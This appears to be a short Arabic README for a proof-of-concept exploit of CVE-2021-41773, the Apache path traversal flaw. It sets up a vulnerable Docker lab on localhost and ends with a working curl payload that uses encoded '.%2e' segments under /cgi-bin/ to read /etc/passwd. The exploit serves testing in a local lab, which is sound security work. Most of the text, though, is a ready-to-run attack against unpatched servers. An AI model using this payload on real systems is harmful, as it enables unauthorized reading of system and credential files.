
PoC لاستغلال CVE-2021-41773 مع إعداد Docker.
انتقل إلى الدليل الذي يحتوي على إعدادات Apache وملف Dockerfile (المشارك في المستودع).
بناء الصورة: ~# docker build -t cve-2021-41773:1.0 .
تشغيل صورة Docker: ~# docker run --rm -d -p 4444:80 cve-2021-41773:1.0 (ملاحظة: يمكنك أيضًا استخدام معرّف الصورة بدلاً من اسم الصورة، واعثر على تفاصيل الصورة باستخدام الأمر 'docker images')
اختبار الخدمة: ~# curl localhost:4444
استغلال الخدمة: ~# curl localhost:4444/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd